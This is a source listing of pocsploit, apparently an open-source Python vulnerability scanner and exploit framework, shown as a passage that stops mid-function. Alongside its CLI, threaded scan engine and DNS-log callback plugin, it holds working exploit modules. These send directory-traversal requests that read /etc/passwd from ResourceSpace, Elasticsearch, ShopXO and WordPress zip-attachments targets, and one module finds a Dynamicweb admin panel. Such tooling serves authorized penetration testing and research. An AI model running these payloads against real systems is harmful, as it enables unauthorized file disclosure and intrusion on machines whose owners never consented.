├── result └── result.log ├── lib ├── utils │ ├── __init__.py │ └── useragent.py ├── vars │ ├── vars.py │ └── info.py ├── controller │ ├── output.py │ └── engine.py ├── core │ ├── common.py │ ├── enums.py │ └── exception.py └── cli.py ├── .gitignore ├── img ├── demo.png └── logo.png ├── requirements.txt ├── conf └── config.py ├── pocsploit.py ├── plugins └── oob.py ├── LICENSE └── modules ├── vulnerabilities ├── other │ ├── dynamicweb-panel.py │ ├── keycloak-xss.py │ ├── openvpn-hhi.py │ ├── oa-tongda-path-traversal.py │ ├── processmaker-lfi.py │ ├── netis-info-leak.py │ ├── gsoap-lfi.py │ ├── mida-eframework-xss.py │ ├── huawei-router-auth-bypass.py │ ├── jfrog-unauth-build-exposed.py │ ├── sponip-network-system-ping-rce.py │ ├── thruk-xss.py │ ├── visual-tools-dvr-rce.py │ ├── vanguard-post-xss.py │ ├── sonicwall-sslvpn-shellshock.py │ ├── yishaadmin-lfi.py │ ├── hashicorp-consul-rce.py │ ├── zimbra-preauth-ssrf.py │ └── dixell-xweb500-filewrite.py ├── apache │ └── apache-ofbiz-log4j-rce.py ├── vmware │ └── vmware-vcenter-lfi.py ├── jamf │ └── jamf-log4j-jndi-rce.py ├── jolokia │ └── jolokia-heap-info-disclosure.py ├── thinkcmf │ └── thinkcmf-rce.py ├── wordpress │ └── wp-multiple-theme-ssrf.py ├── fastjson │ └── fastjson-1-2-62-rce.py └── ruijie │ └── ruijie-nbr1300g-exposure.py ├── cves ├── 2013 │ ├── CVE-2013-2248.py │ ├── CVE-2013-3526.py │ ├── CVE-2013-2287.py │ ├── CVE-2013-5528.py │ ├── CVE-2013-5979.py │ └── CVE-2013-4117.py ├── 2014 │ ├── CVE-2014-5258.py │ ├── CVE-2014-4940.py │ ├── CVE-2014-2962.py │ ├── CVE-2014-10037.py │ ├── CVE-2014-2321.py │ ├── CVE-2014-6308.py │ ├── CVE-2014-3744.py │ ├── CVE-2014-5111.py │ ├── CVE-2014-9094.py │ ├── CVE-2014-9444.py │ ├── CVE-2014-4561.py │ ├── CVE-2014-2323.py │ ├── CVE-2014-8799.py │ ├── CVE-2014-9607.py │ ├── CVE-2014-9609.py │ ├── CVE-2014-9617.py │ ├── CVE-2014-4544.py │ ├── CVE-2014-9608.py │ ├── CVE-2014-5368.py │ └── CVE-2014-2908.py ├── 2015 │ ├── CVE-2015-3648.py │ ├── CVE-2015-3337.py │ ├── 
CVE-2015-4694.py │ ├── CVE-2015-9480.py │ ├── CVE-2015-1000012.py │ ├── CVE-2015-7297.py │ ├── CVE-2015-7780.py │ ├── CVE-2015-5688.py │ ├── CVE-2015-7823.py │ ├── CVE-2015-2166.py │ ├── CVE-2015-6920.py │ ├── CVE-2015-8349.py │ ├── CVE-2015-2067.py │ ├── CVE-2015-1880.py │ ├── CVE-2015-4414.py │ ├── CVE-2015-6544.py │ ├── CVE-2015-8399.py │ ├── CVE-2015-4050.py │ ├── CVE-2015-5471.py │ ├── CVE-2015-0554.py │ ├── CVE-2015-5461.py │ ├── CVE-2015-9414.py │ ├── CVE-2015-2068.py │ ├── CVE-2015-4632.py │ └── CVE-2015-2807.py ├── 2017 │ ├── CVE-2017-17562.py │ └── CVE-2017-15287.py ├── 2018 │ ├── CVE-2018-18778.py │ ├── CVE-2018-7719.py │ ├── CVE-2018-7467.py │ ├── CVE-2018-8715.py │ └── CVE-2018-8033.py ├── 2019 │ ├── CVE-2019-16278.py │ ├── CVE-2019-17538.py │ └── CVE-2019-6715.py ├── 2020 │ ├── CVE-2020-7796.py │ ├── CVE-2020-28208.py │ └── CVE-2020-5777.py ├── 2021 │ └── CVE-2021-3297.py └── 2022 │ ├── CVE-2022-25323.py │ ├── CVE-2022-0281.py │ ├── CVE-2022-0378.py │ ├── CVE-2022-0432.py │ ├── CVE-2022-0692.py │ └── CVE-2022-0218.py └── cnvd └── 2021 └── CNVD-2021-15822.py /result/result.log: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /lib/utils/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | *.pyc 2 | data/ 3 | script/ 4 | conf/config-bak.py 5 | -------------------------------------------------------------------------------- /img/demo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cckuailong/pocsploit/HEAD/img/demo.png -------------------------------------------------------------------------------- /img/logo.png: 
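--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cckuailong/pocsploit/HEAD/img/logo.png
--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
# Runtime dependencies, pinned exactly. NOTE(review): these pins are old;
# requests 2.24.0 and urllib3 1.25.11 both predate later upstream security
# releases of those libraries, so review them against current advisories
# before deploying this tool.
loguru==0.5.3
IPy==1.1
requests==2.24.0
urllib3==1.25.11
--------------------------------------------------------------------------------
/conf/config.py:
--------------------------------------------------------------------------------
# oob
#
# Settings for the out-of-band (DNS log) service used by plugins/oob.py:
#   DNSLOG_URI      - base URL of the DNS-log API (queried at {uri}/v1/records)
#   DNSLOG_TOKEN    - API credential sent with every records query
#   DNSLOG_IDENTIFY - domain suffix under which per-probe flags are generated
#
# DNSLOG_TOKEN is a secret and this file is tracked (.gitignore excludes only
# conf/config-bak.py), so each value is read from the environment first and
# the literals below default to empty; keep real tokens out of version control.
import os

DNSLOG_URI = os.environ.get("DNSLOG_URI", "")
DNSLOG_TOKEN = os.environ.get("DNSLOG_TOKEN", "")
DNSLOG_IDENTIFY = os.environ.get("DNSLOG_IDENTIFY", "")
--------------------------------------------------------------------------------
/lib/vars/vars.py:
--------------------------------------------------------------------------------
"""Process-wide mutable state shared by the CLI, loader and engine.

Each container is an AttribDict (attribute-style dict). Nothing is populated
here; lib/cli.py fills cmdLineOptions and lib/controller/engine.py reads
th.FP_MODE, th.DETECT_MODE, th.THREADS_NUM, th.queue and th.module_objs,
which are set by code outside this listing.
"""
from lib.core.datatype import AttribDict  # NOTE(review): lib/core/datatype.py is not in this listing


# Imported by lib/utils/useragent.py; populated outside this listing.
paths = AttribDict()

# Parsed command-line namespace, copied in by lib/cli.py.
cmdLineOptions = AttribDict()

# Imported by lib/utils/useragent.py; populated outside this listing.
conf = AttribDict()

# Per-run scan state consumed by lib/controller/engine.py.
th = AttribDict()
--------------------------------------------------------------------------------
/lib/controller/output.py:
--------------------------------------------------------------------------------
"""Terminal colouring for finding severities.

Maps the "severity" value of a module's info() dict to an ANSI-coloured tag;
the engine looks results up here when printing a hit.
"""

SEVERITY_OUTPUT = {
    "critical": "\033[01;31;31m[critical]\033[0m",
    "high": "\033[01;35;35m[high]\033[0m",
    "medium": "\033[01;33;33m[medium]\033[0m",
    "low": "\033[01;34;34m[low]\033[0m",
    "info": "\033[01;37;37m[info]\033[0m",
}
--------------------------------------------------------------------------------
/pocsploit.py:
--------------------------------------------------------------------------------
"""Entry point: put the project root on sys.path and hand off to lib.cli.main."""
import os
import sys

import urllib3

# The PoC modules deliberately send verify=False requests to arbitrary
# targets, so silence the per-request InsecureRequestWarning once, globally.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Make `lib`, `conf` and `plugins` importable regardless of the working
# directory. The original appended dirname(dirname(dirname(__file__))),
# which walks above the repository root; this file lives in the root itself.
sys.path.append(os.path.dirname(os.path.abspath(__file__)))

from lib.cli import main  # noqa: E402  (depends on the sys.path change above)


if __name__ == "__main__":
    main()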
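--------------------------------------------------------------------------------
/lib/core/common.py:
--------------------------------------------------------------------------------
import sys
from loguru import logger
from lib.core.enums import EXIT_STATUS
from lib.core.exception import ToolkitValueException


def systemQuit(status=EXIT_STATUS.SYSETM_EXIT):
    """Log why the tool is stopping, then terminate the process.

    Args:
        status: EXIT_STATUS.SYSETM_EXIT (0), USER_QUIT (2) or ERROR_EXIT (1).

    Raises:
        ToolkitValueException: if `status` is none of the values above.
        SystemExit: always, with `status` as the process exit code. The
            original called sys.exit(0) for every status, so a shell or CI
            job could not tell an error exit from a clean one.
    """
    if status == EXIT_STATUS.SYSETM_EXIT:
        logger.info('System Normal exit.')
    elif status == EXIT_STATUS.USER_QUIT:
        logger.error('User exit!')
    elif status == EXIT_STATUS.ERROR_EXIT:
        logger.error('System Error exit.')
    else:
        raise ToolkitValueException('Invalid status code: %s' % str(status))
    sys.exit(status)
--------------------------------------------------------------------------------
/lib/core/enums.py:
--------------------------------------------------------------------------------
"""Integer constants shared across the toolkit (plain classes, not enum.Enum,
so existing attribute access and comparisons keep working)."""


class CONTENT_STATUS:
    IN_PROGRESS = 0
    COMPLETE = 1


class EXIT_STATUS:
    """Exit reasons understood by lib.core.common.systemQuit."""
    SYSETM_EXIT = 0  # normal exit; misspelled name kept because callers use it
    ERROR_EXIT = 1
    USER_QUIT = 2
    SYSTEM_EXIT = SYSETM_EXIT  # correctly spelled alias for new code


class POC_RESULT_STATUS:
    FAIL = 0
    SUCCESS = 1
    RETRAY = 2  # misspelled name kept for compatibility
    RETRY = RETRAY  # correctly spelled alias for new code


class TARGET_MODE_STATUS:
    FILE = 9
    SINGLE = 8
    IPMASK = 7
    RANGE = 6
    API = 5


class PROXY_TYPE:  # keep same with SocksiPy(import socks)
    PROXY_TYPE_SOCKS4 = SOCKS4 = 1
    PROXY_TYPE_SOCKS5 = SOCKS5 = 2
    PROXY_TYPE_HTTP = HTTP = 3
    PROXY_TYPE_HTTP_NO_TUNNEL = 4
--------------------------------------------------------------------------------
/lib/core/exception.py:
--------------------------------------------------------------------------------
"""Exception hierarchy for the toolkit.

Toolkit* errors are rooted at ToolkitBaseException so callers can catch the
whole family at once; Register* errors form a second, independent family.
"""


class ToolkitBaseException(Exception):
    pass


class ToolkitConnectionException(ToolkitBaseException):
    # Was derived directly from Exception, which made it the only Toolkit*
    # error that `except ToolkitBaseException` did not catch.
    pass


class ToolkitDataException(ToolkitBaseException):
    pass


class ToolkitMissingPrivileges(ToolkitBaseException):
    pass


class ToolkitUserQuitException(ToolkitBaseException):
    pass


class ToolkitSystemException(ToolkitBaseException):
    pass


class ToolkitValueException(ToolkitBaseException):
    pass


class ToolkitPluginException(ToolkitBaseException):
    pass


class RegisterException(Exception):
    pass


class RegisterValueException(RegisterException):
    pass


class RegisterDataException(RegisterException):
    pass


class RegisterMutexException(RegisterException):
    pass
--------------------------------------------------------------------------------
/lib/vars/info.py:
--------------------------------------------------------------------------------
"""Static project metadata and the start-up banner."""
import os

VERSION = '0.0.1'
PROJECT = "pocsploit"
AUTHOR = 'cckuailong'
PLATFORM = os.name
LICENSE = 'MIT'

# essential methods/functions in custom modules (such as function poc())
ESSENTIAL_MODULE_METHODS = ['info', 'fingerprint', 'poc', 'exp']

GIT_REPOSITORY = "https://github.com/cckuailong/pocsploit"

# Coloured figlet-style art printed by lib/cli.py. NOTE(review): the column
# alignment of the art is not recoverable from this listing; restore the
# exact spacing from upstream if the banner looks skewed.
BANNER = '''
\033[01;31;31m__ _ __ \033[0m
\033[01;33;33m____ ____ _____\033[0m\033[01;31;31m_________ / /___ (_) /_\033[0m
\033[01;33;33m/ __ \/ __ \/ ___\033[0m\033[01;31;31m/ ___/ __ \/ / __ \/ / __/\033[0m
\033[01;33;33m/ /_/ / /_/ / /__\033[0m\033[01;31;31m(__ ) /_/ / / /_/ / / /_ \033[0m
\033[01;33;33m/ .___/\____/\___/\033[0m\033[01;31;31m____/ .___/_/\____/_/\__/ \033[0m
\033[01;33;33m/_/ \033[0m\033[01;31;31m/_/ \033[0m
\033[01;37m{\033[01;m Version %s by %s \033[01;37m}\033[0m
\n''' % (VERSION, AUTHOR)
--------------------------------------------------------------------------------
/plugins/oob.py:
--------------------------------------------------------------------------------
"""Out-of-band (DNS log) helpers for blind checks such as JNDI/SSRF probes.

A probe embeds a fresh random flag in a hostname under DNSLOG_IDENTIFY; if
the target resolves or fetches it, the DNS-log service records it and
verify_request() can find the flag afterwards. Settings come from
conf/config.py.
"""
import secrets
import string
import time

import requests

from conf.config import DNSLOG_IDENTIFY, DNSLOG_TOKEN, DNSLOG_URI

FLAG_LENGTH = 10
POLL_ATTEMPTS = 3
POLL_DELAY_SECONDS = 3


def _new_flag():
    """Return a 10-character lowercase flag.

    Uses `secrets` rather than `random`: the flag is the only thing tying a
    logged callback to this probe, so it should not be guessable by someone
    who knows DNSLOG_IDENTIFY. Drawing from ascii_lowercase yields the same
    value space as the original ascii_letters + .lower().
    """
    return "".join(secrets.choice(string.ascii_lowercase) for _ in range(FLAG_LENGTH))


def gen_oob_domain():
    """Return (domain, flag) where domain is `<flag>.<DNSLOG_IDENTIFY>`."""
    flag = _new_flag()
    return "{}.{}".format(flag, DNSLOG_IDENTIFY), flag


def gen_oob_url():
    """Return (url, flag) where url is `http://<flag>.<DNSLOG_IDENTIFY>/`."""
    flag = _new_flag()
    return "http://{}.{}/".format(flag, DNSLOG_IDENTIFY), flag


def verify_request(type, flag):
    """Poll the DNS-log API for a record containing `flag`.

    Args:
        type: record-type filter forwarded to the API as `type=` (the name
            shadows the builtin but is kept so keyword callers still work).
        flag: the flag returned by gen_oob_domain()/gen_oob_url().

    Returns:
        True as soon as a 200 response body contains the flag; False after
        three attempts (3 s pause before each, an extra 1 s after a failed
        request) without a match.
    """
    endpoint = "{uri}/v1/records".format(uri=DNSLOG_URI)
    # Sent as params so token/flag are URL-encoded rather than interpolated
    # verbatim into the query string.
    query = {"token": DNSLOG_TOKEN, "type": type, "filter": flag}
    for _ in range(POLL_ATTEMPTS):
        time.sleep(POLL_DELAY_SECONDS)
        try:
            resp = requests.get(endpoint, params=query, timeout=5)
        except requests.RequestException:
            time.sleep(1)
            continue
        if resp.status_code == 200 and flag in str(resp.content):
            return True
    return False
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
MIT License

Copyright (c) 2022 cckuailong

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.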
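IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
--------------------------------------------------------------------------------
/lib/utils/useragent.py:
--------------------------------------------------------------------------------
"""User-Agent strings for outgoing requests: one random pick from UA_LIST
plus a few fixed browser and crawler identities."""
import random
from loguru import logger  # unused in this file; kept with the original import block
from lib.vars.vars import conf, th, paths  # unused in this file; kept with the original import block
from lib.vars.ua import UA_LIST  # NOTE(review): lib/vars/ua.py is not in this listing


def get_random_agent():
    """Return one entry of UA_LIST chosen uniformly at random."""
    return random.choice(UA_LIST)


def firefox():
    """Fixed desktop Firefox identity."""
    return 'Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0'


def ie():
    """Fixed Internet Explorer 9 identity."""
    return 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)'


def chrome():
    """Fixed desktop Chrome identity."""
    return 'Mozilla/5.0 (Windows NT 5.2) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30'


def opera():
    """Fixed Opera identity."""
    return 'Opera/9.80 (Windows NT 5.1; U; zh-cn) Presto/2.9.168 Version/11.50'


def iphone():
    """Fixed iPhone Safari identity."""
    return 'Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16'


def google_bot():
    """Googlebot crawler identity."""
    return 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'


def msn_bot():
    """msnbot crawler identity."""
    return 'msnbot/1.1 (+http://search.msn.com/msnbot.htm)'


def yahoo_bot():
    """Yahoo! Slurp crawler identity."""
    return 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)'
--------------------------------------------------------------------------------
/lib/cli.py:
--------------------------------------------------------------------------------
"""Command-line front end: banner, option parsing, module/target loading, scan."""
import os
import traceback
from loguru import logger
from lib.vars.vars import *
from lib.vars.info import BANNER, GIT_REPOSITORY
from lib.core.parse import cmdLineParser
from lib.core.option import initOptions
from lib.controller.loader import loadModule, loadTargets
from lib.controller.engine import run
from lib.core.common import systemQuit
from lib.core.enums import EXIT_STATUS
from lib.core.exception import ToolkitUserQuitException
from lib.core.exception import ToolkitMissingPrivileges
from lib.core.exception import ToolkitSystemException


def main():
    """Parse options, load modules and targets, run the scan, then exit.

    Every path ends in systemQuit so the process exit status reflects the
    outcome. Unexpected exceptions are logged with their traceback and turned
    into an error exit; the original fell off the end of the handler and so
    exited 0 even after a crash.
    """
    try:
        print(BANNER)

        cmdLineOptions.update(cmdLineParser().__dict__)
        initOptions(cmdLineOptions)

        loadModule()
        loadTargets()

        run()

        systemQuit(EXIT_STATUS.SYSETM_EXIT)

    except (ToolkitMissingPrivileges, ToolkitSystemException) as e:
        logger.error(e)
        systemQuit(EXIT_STATUS.ERROR_EXIT)

    except (ToolkitUserQuitException, KeyboardInterrupt):
        systemQuit(EXIT_STATUS.USER_QUIT)

    except Exception:
        logger.warning(traceback.format_exc())
        # The original message ended in "via:." with no URL to report to.
        logger.warning('It seems like you reached an unhandled exception, please raise an issue via: {}'.format(GIT_REPOSITORY))
        systemQuit(EXIT_STATUS.ERROR_EXIT)
--------------------------------------------------------------------------------
/modules/vulnerabilities/other/dynamicweb-panel.py:
--------------------------------------------------------------------------------
import requests


# Vuln Base Info
def info():
    """Static metadata for this check; severity "info" because it only locates a login panel."""
    return {
        "author": "cckuailong",
        "name": "Dynamicweb Login Panel",
        "description":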
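# continued: remaining fields of info() in dynamicweb-panel.py
            "",
        "severity": "info",
        "references": [
            "https://www.dynamicweb.com"
        ],
        "classification": {
            "cvss-metrics": "",
            "cvss-score": "",
            "cve-id": "",
            "cwe-id": ""
        },
        "metadata": {
            "vuln-target": "",
            "shodan-query": 'http.component:"Dynamicweb"'
        },
        "tags": ["panel", "dynamicweb"],
    }


# Vender Fingerprint
def fingerprint(url):
    """Placeholder vendor check: always True, so FP mode never filters this module out."""
    return True


# Proof of Concept
def poc(url):
    """Report a hit when /Admin/Access/default.aspx answers 200 and mentions Dynamicweb.

    This only locates an exposed admin login panel; it tests no credentials
    and no vulnerability.

    Returns:
        {} on no match, {"success": False} if the request failed, otherwise
        {"success": True, "info": info(), "payload": <url probed>}.
    """
    result = {}
    try:
        url = format_url(url)
        path = "/Admin/Access/default.aspx"
        headers = {'Accept-Encoding': 'gzip, deflate'}
        # verify=False: scan targets commonly use self-signed certificates;
        # the matching warning is silenced once in pocsploit.py.
        resp = requests.get(url + path, headers=headers, timeout=10, verify=False, allow_redirects=False)
        if resp.status_code == 200 and "Dynamicweb" in resp.text:
            result["success"] = True
            result["info"] = info()
            result["payload"] = url + path
    except requests.RequestException:
        # Transport errors only; the original bare except also hid programming
        # errors such as a missing import.
        result["success"] = False
    return result


# Exploit, can be same with poc()
def exp(url):
    """No separate exploit stage for a panel check: identical to poc()."""
    return poc(url)


# Utils
def format_url(url):
    """Normalise a target: strip whitespace, default to http://, drop trailing '/'."""
    url = url.strip()
    if not url.startswith(("http://", "https://")):
        url = "http://" + url
    return url.rstrip("/")
--------------------------------------------------------------------------------
/modules/cves/2015/CVE-2015-3648.py:
--------------------------------------------------------------------------------
import requests


# Vuln Base Info
def info():
    """Static metadata for the ResourceSpace LFI check (CVE-2015-3648)."""
    return {
        "author": "cckuailong",
        "name": "ResourceSpace - Local File inclusion",
        "description": "ResourceSpace is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.",
        "severity": "high",
        "references": [
            "https://vulners.com/cve/CVE-2015-3648/",
            "https://www.securityfocus.com/bid/75019"
        ],
        "classification": {
            "cvss-metrics": "",
            "cvss-score": "",
            "cve-id": "CVE-2015-3648",  # was empty; taken from the module name and reference
            "cwe-id": ""
        },
        "metadata": {
            "vuln-target": "",
        },
        "tags": ["cve", "cve2015", "lfi", "resourcespace"],
    }


# Vender Fingerprint
def fingerprint(url):
    """Placeholder vendor check: always True, so FP mode never filters this module out."""
    return True


# Proof of Concept
def poc(url):
    """Traverse to /etc/passwd via the `defaultlanguage` parameter of pages/setup.php.

    A hit requires HTTP 200 and "root:" in the body, i.e. actual file
    contents were returned (read-only check, no writes).

    Returns:
        {} on no match, {"success": False} if the request failed, otherwise
        {"success": True, "info": info(), "payload": <url probed>}.
    """
    result = {}
    try:
        url = format_url(url)
        path = "/pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
        resp = requests.get(url + path, timeout=10, verify=False, allow_redirects=False)
        if resp.status_code == 200 and "root:" in resp.text:
            result["success"] = True
            result["info"] = info()
            result["payload"] = url + path
    except requests.RequestException:
        # Transport errors only; other exceptions now surface instead of being
        # swallowed by a bare except.
        result["success"] = False
    return result


# Exploit, can be same with poc()
def exp(url):
    """The file read is the whole demonstration: identical to poc()."""
    return poc(url)


# Utils
def format_url(url):
    """Normalise a target: strip whitespace, default to http://, drop trailing '/'."""
    url = url.strip()
    if not url.startswith(("http://", "https://")):
        url = "http://" + url
    return url.rstrip("/")
--------------------------------------------------------------------------------
/lib/controller/engine.py:
--------------------------------------------------------------------------------
"""Scan driver: fan every (target, module) pair out to a thread pool and print hits."""
from concurrent.futures import ThreadPoolExecutor, wait, as_completed, ALL_COMPLETED
from loguru import logger
from lib.vars.vars import th
from lib.controller.output import SEVERITY_OUTPUT


def _detect(target, module_obj):
    """Run the stage selected by th.DETECT_MODE ("poc" or "exp"); {} for any other value."""
    if th.DETECT_MODE == "poc":
        return module_obj.poc(target)
    if th.DETECT_MODE == "exp":
        return module_obj.exp(target)
    return {}


def scan(target, module_obj):
    """Run one module against one target and log a finding if it succeeded.

    With th.FP_MODE set, module_obj.fingerprint(target) gates the detection
    stage; otherwise poc()/exp() runs unconditionally.

    Modules return {} for "no match", {"success": False} when their request
    failed, and a dict with "success", "info" and "payload" on a hit. Only
    the last carries "info"/"payload", so the result is gated on the success
    flag: the original `if result:` treated {"success": False} as a hit and
    raised KeyError inside the worker thread.
    """
    if th.FP_MODE:
        if not module_obj.fingerprint(target):
            logger.warning(f"[FP] {target} not the fingerprint")
            return
        logger.debug(f"[FP] {target} target the fingerprint, do poc/exp next")
    result = _detect(target, module_obj)

    if not result or not result.get("success"):
        return
    info = result["info"]
    severity = info.get("severity")
    # An unknown severity is printed bare instead of raising KeyError.
    severity_tag = SEVERITY_OUTPUT.get(severity, "[{}]".format(severity))
    logger.success("[{}]{}[{}] {}".format(
        module_obj.__name__,
        severity_tag,
        "\033[1m" + info["name"] + "\033[0m",
        result["payload"],
    ))


def run():
    """Drain th.queue, schedule scan() for every target x loaded module, and wait.

    wait() does not re-raise worker exceptions, so each failed task is logged
    afterwards; otherwise a broken module (for example one missing an import)
    silently produces no results.
    """
    with ThreadPoolExecutor(max_workers=th.THREADS_NUM) as executor:
        tasks = {}
        while th.queue.qsize() > 0:
            target = th.queue.get(timeout=1)
            for module_obj in th.module_objs:
                future = executor.submit(scan, target, module_obj)
                tasks[future] = (target, module_obj.__name__)

        wait(list(tasks), return_when=ALL_COMPLETED)

        for future, (target, module_name) in tasks.items():
            exc = future.exception()
            if exc is not None:
                logger.warning("[{}] {} raised {!r}".format(module_name, target, exc))
--------------------------------------------------------------------------------
/modules/cnvd/2021/CNVD-2021-15822.py:
--------------------------------------------------------------------------------
import re

import requests


# Vuln Base Info
def info():
    """Static metadata for the ShopXO arbitrary file read check (CNVD-2021-15822)."""
    return {
        "author": "cckuailong",
        "name": "ShopXO Download File Read",
        "description": "",
        "severity": "high",
        "references": [
            "https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog"
        ],
        "classification": {
            "cvss-metrics": "",
            "cvss-score": "",
            "cve-id": "",
            "cwe-id": ""
        },
        "metadata": {
            "vuln-target": "",
        },
        "tags": ["shopxo", "lfi", "cnvd", "cnvd2021"],
    }


# Vender Fingerprint
def fingerprint(url):
    """Placeholder vendor check: always True, so FP mode never filters this module out."""
    return True


# Proof of Concept
def poc(url):
    """Ask the qrcode download endpoint for base64("/etc/passwd") and look for the root entry.

    Returns:
        {} on no match, {"success": False} if the request failed, otherwise
        {"success": True, "info": info(), "payload": <url probed>}.
    """
    result = {}
    try:
        url = format_url(url)
        # L2V0Yy9wYXNzd2Q= is base64("/etc/passwd"). The original literal ended
        # in a space, which requests would have sent as a trailing %20.
        path = "/public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q="
        headers = {'Content-Type': 'application/x-www-form-urlencoded'}
        resp0 = requests.get(url + path, headers=headers, timeout=10, verify=False, allow_redirects=False)
        # `re` was used here without being imported; under the old bare except
        # the NameError was swallowed and the check always reported failure.
        if resp0.status_code == 200 and re.search(r"root:.*:0:0", resp0.text):
            result["success"] = True
            result["info"] = info()
            result["payload"] = url + path
    except requests.RequestException:
        result["success"] = False
    return result


# Exploit, can be same with poc()
def exp(url):
    """The file read is the whole demonstration: identical to poc()."""
    return poc(url)


# Utils
def format_url(url):
    """Normalise a target: strip whitespace, default to http://, drop trailing '/'."""
    url = url.strip()
    if not url.startswith(("http://", "https://")):
        url = "http://" + url
    return url.rstrip("/")
--------------------------------------------------------------------------------
/modules/cves/2015/CVE-2015-3337.py:
--------------------------------------------------------------------------------
import requests


# Vuln Base Info
def info():
    """Static metadata for the Elasticsearch site-plugin traversal check (CVE-2015-3337)."""
    return {
        "author": "cckuailong",
        "name": "Elasticsearch Head plugin LFI",
        "description": "Directory traversal vulnerability in Elasticsearch before 1.4.5 and 1.5.x before 1.5.2, when a site plugin is enabled, allows remote attackers to read arbitrary files via unspecified vectors.",
        "severity": "high",
        "references": [
            "https://www.exploit-db.com/exploits/37054/"
        ],
        "classification": {
            "cvss-metrics": "",
            "cvss-score": "",
            "cve-id": "CVE-2015-3337",  # was empty; taken from the module name
            "cwe-id": ""
        },
        "metadata": {
            "vuln-target": "",
        },
        "tags": ["cve", "cve2015", "elastic", "lfi", "elasticsearch", "plugin"],
    }


# Vender Fingerprint
def fingerprint(url):
    """Placeholder vendor check: always True, so FP mode never filters this module out."""
    return True


# Proof of Concept
def poc(url):
    """Traverse out of the `head` site plugin directory to /etc/passwd.

    The dot segments are part of the payload and must reach the server
    unchanged; a proxy or client that normalises the path would mask a
    vulnerable host.

    Returns:
        {} on no match, {"success": False} if the request failed, otherwise
        {"success": True, "info": info(), "payload": <url probed>}.
    """
    result = {}
    try:
        url = format_url(url)
        path = "/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd"
        resp = requests.get(url + path, timeout=10, verify=False, allow_redirects=False)
        if resp.status_code == 200 and "root:" in resp.text:
            result["success"] = True
            result["info"] = info()
            result["payload"] = url + path
    except requests.RequestException:
        result["success"] = False
    return result


# Exploit, can be same with poc()
def exp(url):
    """The file read is the whole demonstration: identical to poc()."""
    return poc(url)


# Utils
def format_url(url):
    """Normalise a target: strip whitespace, default to http://, drop trailing '/'."""
    url = url.strip()
    if not url.startswith(("http://", "https://")):
        url = "http://" + url
    return url.rstrip("/")
--------------------------------------------------------------------------------
/modules/cves/2015/CVE-2015-4694.py:
--------------------------------------------------------------------------------
import requests


# Vuln Base Info
def info():
    """Static metadata for the WordPress zip-attachments download check (CVE-2015-4694)."""
    return {
        "author": "cckuailong",
        "name": "Zip Attachments <= 1.1.4 - Arbitrary File Download",
        "description": "The zip-attachments plugin allows arbitrary file downloads because it does not check the download path of the requested file.",
        "severity": "high",
        "references": [
            "https://wpscan.com/vulnerability/8047"
        ],
        "classification": {
            "cvss-metrics": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
            "cvss-score": "8.6",
            "cve-id": "CVE-2015-4694",
            "cwe-id": "CWE-22"
        },
        "metadata": {
            "vuln-target": "",
        },
        "tags": ["lfi", "wordpress", "cve", "cve2015", "wp-plugin"],
    }


# Vender Fingerprint
def fingerprint(url):
    """Placeholder vendor check: always True, so FP mode never filters this module out."""
    return True


# Proof of Concept
def poc(url):
    """Request /etc/passwd through the plugin's download.php `za_file` parameter.

    Returns:
        {} on no match, {"success": False} if the request failed, otherwise
        {"success": True, "info": info(), "payload": <url probed>}.
    """
    result = {}
    try:
        url = format_url(url)
        path = "/wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd"
        resp = requests.get(url + path, timeout=10, verify=False, allow_redirects=False)
        if resp.status_code == 200 and "root:" in resp.text:
            result["success"] = True
            result["info"] = info()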
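# continued: remainder of poc() in CVE-2015-4694.py
            result["payload"] = url + path
    except requests.RequestException:
        # Transport errors only; other exceptions now surface instead of being
        # swallowed by a bare except.
        result["success"] = False
    return result


# Exploit, can be same with poc()
def exp(url):
    """The file read is the whole demonstration: identical to poc()."""
    return poc(url)


# Utils
def format_url(url):
    """Normalise a target: strip whitespace, default to http://, drop trailing '/'."""
    url = url.strip()
    if not url.startswith(("http://", "https://")):
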